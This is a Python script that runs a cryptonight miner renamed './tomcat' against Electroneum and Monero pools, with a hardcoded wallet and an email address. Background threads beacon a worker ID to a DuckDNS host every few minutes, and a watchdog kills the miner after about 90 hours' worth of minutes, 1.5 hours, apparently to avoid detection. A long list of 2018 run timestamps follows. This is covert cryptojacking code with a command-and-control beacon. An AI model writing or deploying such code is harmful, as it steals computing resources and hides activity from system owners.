import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:13:06.448429
#2018-02-17 17:01:04.558612
#2018-02-17 18:50:04.526005
#2018-02-17 20:37:05.163005
#2018-02-17 22:22:07.376553
#2018-02-18 00:06:05.504618
#2018-02-18 01:56:06.276146
#2018-02-18 03:44:01.458334
#2018-02-18 05:32:04.543183
#2018-02-18 07:24:05.454393
#2018-02-18 09:12:04.653018
#2018-02-18 10:58:05.568410
#2018-02-18 12:45:07.532879
#2018-02-18 14:31:07.094185
#2018-02-18 16:21:03.435257
#2018-02-18 18:10:07.680376
#2018-02-18 19:56:01.531143
#2018-02-18 21:42:05.371021
#2018-02-18 23:31:07.135816
#2018-02-19 01:17:05.140235
#2018-02-19 03:04:05.924969
#2018-02-19 04:50:09.038646
#2018-02-19 06:35:06.188194
#2018-02-19 08:24:05.342693
#2018-02-19 10:14:07.195129
#2018-02-19 12:02:04.871514
#2018-02-19 13:48:13.339455
#2018-02-19 15:38:04.593883
#2018-02-19 17:26:10.203588
#2018-02-19 19:14:07.558790
#2018-02-19 21:02:01.256941
#2018-02-19 22:49:07.134691
#2018-02-20 00:34:03.587586
#2018-02-20 02:24:07.679490
#2018-02-20 04:15:02.239438
#2018-02-20 05:58:03.358760
#2018-02-20 07:45:01.955097
#2018-02-20 09:29:01.946006
#2018-02-20 11:13:01.250838
#2018-02-20 13:01:04.385618
#2018-02-20 14:44:11.626542
#2018-02-20 16:29:05.357089
#2018-02-20 18:16:01.252019
#2018-02-20 20:07:04.056622
#2018-02-20 21:55:04.934977
#2018-02-20 23:38:01.634579
#2018-02-21 01:21:04.911443
#2018-02-21 03:09:06.286569
#2018-02-21 04:57:01.650168
#2018-02-21 06:43:05.586469
#2018-02-21 08:52:03.817076
#2018-02-21 10:39:06.056304
#2018-02-21 12:26:02.136378
#2018-02-21 14:12:07.631587
#2018-02-21 15:58:01.647239
#2018-02-21 17:49:04.564841
#2018-02-21 19:34:06.366157
#2018-02-21 21:21:06.078063
#2018-02-21 23:09:05.578641
#2018-02-22 00:58:02.148534
#2018-02-22 02:46:02.175498
#2018-02-22 04:32:05.423515
#2018-02-22 06:17:03.207712
#2018-02-22 08:03:07.414630
#2018-02-22 09:51:05.736217
#2018-02-22 11:35:11.627210
#2018-02-22 13:23:08.206872
#2018-02-22 15:12:07.927017
#2018-02-22 16:55:09.732643
#2018-02-22 18:44:10.135049
#2018-02-22 20:35:01.357097
#2018-02-22 22:20:11.203202
#2018-02-23 00:06:09.079912
#2018-02-23 01:55:07.585570
#2018-02-23 03:42:06.730945
#2018-02-23 05:27:01.251034
#2018-02-23 07:13:02.085632
#2018-02-23 09:18:03.918310
#2018-02-23 11:25:07.391490
#2018-02-23 13:16:05.669638
#2018-02-23 15:01:08.019086
#2018-02-23 16:49:04.184237
#2018-02-23 18:37:04.740568
#2018-02-23 20:25:09.491566
#2018-02-23 22:13:05.157434
#2018-02-23 23:59:04.387383
#2018-02-24 01:48:07.551019
#2018-02-24 03:34:04.647481
#2018-02-24 05:19:07.055453
#2018-02-24 07:07:01.836292
#2018-02-24 08:54:04.356502
#2018-02-24 10:53:01.473989
#2018-02-24 12:41:05.406687
#2018-02-24 14:29:06.702059
#2018-02-24 16:17:06.923043
#2018-02-24 18:11:05.598484
#2018-02-24 19:57:05.621260
#2018-02-24 21:40:09.090493
#2018-02-25 00:35:07.026267
#2018-02-25 04:26:07.291336
#2018-02-25 08:08:03.909263